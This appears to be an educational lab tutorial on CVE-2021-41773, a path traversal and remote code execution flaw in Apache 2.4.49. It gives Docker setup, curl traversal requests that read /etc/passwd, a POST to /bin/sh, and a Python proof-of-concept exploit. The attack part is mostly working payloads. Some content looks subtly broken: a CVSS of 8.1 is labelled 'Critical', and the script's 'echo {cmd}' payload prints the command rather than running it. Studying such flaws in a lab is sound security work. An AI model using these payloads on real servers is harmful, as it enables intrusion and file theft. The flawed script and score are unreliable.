CVE-2021-41773: Apache Path Traversal
Disclaimer: This content is for educational purposes only. Do not use this knowledge to attack systems without authorization. Always obtain proper permission before testing vulnerabilities.
What is CVE-2021-41773?
A path traversal vulnerability in Apache HTTP Server 2.4.49. When mod-cgi is enabled, attackers can use ../ sequences to traverse directories and execute arbitrary code via the CGI script.
CVSS Score: 8.1 (Critical)
Affected Version: Apache HTTP Server 2.4.49
Environment Setup
Spin up a vulnerable Docker container:
# Run vulnerable Apache 2.4.49
docker run -d --name vuln-apache \
-p 8080:80 \
citizenstig/httpd:cve-2021-41773Verify it’s running:
curl http://localhost:8080/Vulnerability Explanation
The vulnerability is in how Apache handles URL paths with ../ sequences. When mod-cgi is enabled, this allows:
- Reading sensitive files outside document root (path traversal)
- Executing CGI scripts if certain conditions are met
Exploitation
Check for Path Traversal (LFI)
curl -v 'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'If vulnerable, you’ll see /etc/passwd contents.
Attempt RCE (if mod-cgi enabled)
# Simple RCE check
curl -v 'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' \
-d 'echo CTF{test}'Full POC Script
#!/usr/bin/env python3
import requests
import sys
TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8080"
def exploit(cmd):
payload = f"/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"
data = f"echo {cmd}"
r = requests.post(f"{TARGET}{payload}", data=data)
return r.text
# Test RCE
print("[*] Testing RCE...")
result = exploit("whoami")
print(result)References
Remediation
Upgrade to Apache HTTP Server 2.4.51 or later.